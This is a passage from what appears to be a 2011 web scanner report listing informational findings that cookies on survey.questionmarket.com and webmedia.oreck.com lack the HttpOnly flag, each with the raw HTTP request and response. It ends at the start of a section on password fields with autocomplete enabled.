Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

GIF89a...................!.......,..........s...............+..H..........-@..........
.....L*....    .J......j............N...............|....(8HH.q.........iQ..;

12.25. http://survey.questionmarket.com/images/survey/qm-red-survey-footer2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /images/survey/qm-red-survey-footer2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/survey/qm-red-survey-footer2.gif HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:30 GMT
Server: Apache
Last-Modified: Tue, 11 Jan 2005 18:44:56 GMT
ETag: "10050cee-3dc-3ed6b14c6fa00"
Accept-Ranges: bytes
Content-Length: 988
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
Content-Type: image/gif
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

GIF89a..<............Q..[....................a........}.....`..w........S..n..c...........t..T...........i.....p.....b.................c...........]..e.................................................
...[SNIP]...

12.26. http://survey.questionmarket.com/surv/913131/ai_final.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/ai_final.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/913131/ai_final.php?member_id=326080549&site=10&from_aicode=922738&survey_num=913131 HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 14:37:58 GMT
Server: Apache
Location: http://survey.questionmarket.com/surv/913131/fakesurvey1.html
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/


12.27. http://survey.questionmarket.com/surv/913131/ai_start.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/ai_start.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/913131/ai_start.php?site=10&from_aicode=922738 HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 14:37:47 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Location: http://s.dlqm.net/asdet/read_dlqm_v2.php?site=10&from_aicode=922738&survey_num=913131
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/


12.28. http://survey.questionmarket.com/surv/913131/newai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/newai.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/913131/newai.php?member_id=326080549&site=10&from_aicode=922738 HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:38:10 GMT
Server: Apache
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Pragma: no-cache
Expires: -1
Last-Modified: Sat, 17 Sep 2011 14:38:11 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Vary: Accept-Encoding
Content-Length: 7141
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

12.29. http://survey.questionmarket.com/surv/913131/slider.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/slider.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/913131/slider.js HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php?member_id=326080549&site=10&from_aicode=922738
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:19 GMT
Server: Apache
Last-Modified: Thu, 07 Jul 2011 20:04:05 GMT
ETag: "6003a9d2-b55-4a7803818d7a2"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 2901
Content-Type: application/javascript
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

function slider_slide( elt, event, min, max, scale, id ) {

if( ! event )
event = window.event;

var step = (max - min) / (scale);

// How to get our position from the absolute event positio
...[SNIP]...

12.30. http://survey.questionmarket.com/surv/913131/surv.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/surv.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/913131/surv.js HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php?member_id=326080549&site=10&from_aicode=922738
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:19 GMT
Server: Apache
Last-Modified: Thu, 07 Jul 2011 20:04:05 GMT
ETag: "6003ab9b-11f3-4a780381c13c8"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 4595
Content-Type: application/javascript
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

var disable_continue=0;
var timeout_continue=0;

//determine localtime from user's machine time
function dl_localtime() {
   var d = new Date();
   var dd = d.getDate();
   var mm = d.getMonth()+1;
   var yyy
...[SNIP]...

12.31. http://survey.questionmarket.com/surv/913131/transparent.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/transparent.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/913131/transparent.php?id=913131&p=2&m=326080549&fs=10&ec=1&fn=0 HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php?member_id=326080549&site=10&from_aicode=922738
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:39:07 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 43
Content-Type: image/gif
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

GIF89a.............!.......,...........D..;

12.32. http://survey.questionmarket.com/surv/925590/newai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/925590/newai.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt= HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:24 GMT
Server: Apache
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Pragma: no-cache
Expires: -1
Last-Modified: Sat, 17 Sep 2011 14:41:24 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Vary: Accept-Encoding
Content-Length: 7609
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

12.33. http://survey.questionmarket.com/surv/925590/slider.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/925590/slider.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/925590/slider.js HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:37 GMT
Server: Apache
Last-Modified: Thu, 15 Sep 2011 16:51:35 GMT
ETag: "a4f05b78-b55-4acfdb084499b"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 2901
Content-Type: application/javascript
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

function slider_slide( elt, event, min, max, scale, id ) {

if( ! event )
event = window.event;

var step = (max - min) / (scale);

// How to get our position from the absolute event positio
...[SNIP]...

12.34. http://survey.questionmarket.com/surv/925590/surv.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/925590/surv.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/925590/surv.js HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:37 GMT
Server: Apache
Last-Modified: Thu, 15 Sep 2011 16:51:35 GMT
ETag: "a4f05c61-11f3-4acfdb0871861"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 4595
Content-Type: application/javascript
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

var disable_continue=0;
var timeout_continue=0;

//determine localtime from user's machine time
function dl_localtime() {
   var d = new Date();
   var dd = d.getDate();
   var mm = d.getMonth()+1;
   var yyy
...[SNIP]...

12.35. http://survey.questionmarket.com/surv/925590/transparent.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/925590/transparent.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surv/925590/transparent.php?id=925590&p=23&m=326080549&fs=5&ec=0&fn=0 HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:49 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 43
Content-Type: image/gif
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

GIF89a.............!.......,...........D..;

12.36. http://survey.questionmarket.com/veranda/cpd_survey.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /veranda/cpd_survey.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /veranda/cpd_survey.php?disq=1 HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/adscgen/endsurvey_disq.php
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:47 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/


12.37. http://webmedia.oreck.com/cookE/geoip/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href= HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:03:40 GMT
Server: Apache
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:03:40 GMT; path=/; domain=.oreck.com
Set-Cookie: CSList=1088660/1113699,0/0,0/0,0/0,0/0; expires=Fri, 16 Dec 2011 13:03:40 GMT; path=/; domain=.oreck.com
x_transtrans: 11.6.10.688
Content-Type: text/html
Content-Length: 5290
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...

13. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

